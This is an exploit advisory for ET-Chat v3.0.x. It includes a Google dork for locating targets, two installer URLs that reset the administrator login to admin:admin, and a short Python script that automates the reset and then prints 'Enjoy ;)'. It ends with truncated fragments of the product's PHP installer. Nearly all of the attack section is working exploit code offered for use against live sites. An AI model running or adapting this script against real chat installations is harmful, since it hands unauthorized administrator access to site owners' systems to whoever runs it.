**************************************************
IIIIIIII RRRRRRRRRRRR HHHHHHHH HHHHHHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRRRRRRRR HHHHHHHHHHHHHHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIIIIIII RRRRRRRR RRRRRR HHHHHHHH HHHHHHHH
***************************************************
# Exploit Title: Et-chat Admin Reset Password v3.0.7
# Google Dork: inurl:/?InstallIndex or intext:Willkommen bei der Installation von ET-Chat v3 or intext:Installation starten >>>
# Date: 2012-found , 2014-public
# Exploit Author: IRH
# Tested on: 7,8
# version : v3.0.x
# Software Link: http://www.sedesign.de/de_produkte_chat-v3.html
# Screen shot: http://cld.persiangig.com/preview/jBfFoVmTl5/install_reset_password.png
***************************************************
Exploit :
site.com/chat/?InstallIndex
site.com/chat/?InstallMake
info :
if chatroom have a installation folder
open this link for reset user and password to admin:admin
***************************************************
Python exploit :
#!/usr/bin/env python
__author__ = 'IRH'
print "Example: et-chat.py http://et-chat.com/chat"
import urllib
import sys
url = sys.argv[1]
url1 = url+"/?InstallIndex"
url2 = url+"/?InstallMake"
checkurl = urllib.urlopen(url1)
if checkurl.code == 200 :
urllib.urlopen(url2)
print "Password Was Reseted!! Enjoy ;)"
else:
print "Site is not Vulnerability"
***************************************************
FEHLER!!!
PHP Version = ".phpversion()." (sollte jedoch >= 5.1.2 sein!)";
else
// redirect
header('Location: ../?InstallIndex');
*********
public function __construct (){
// call parent Constructor from class EtChatConfig
parent::__construct();
$install_error = "";
if ($this->_usedDatabaseExtension=="pdo"){
if (!extension_loaded('pdo')) $install_error .= "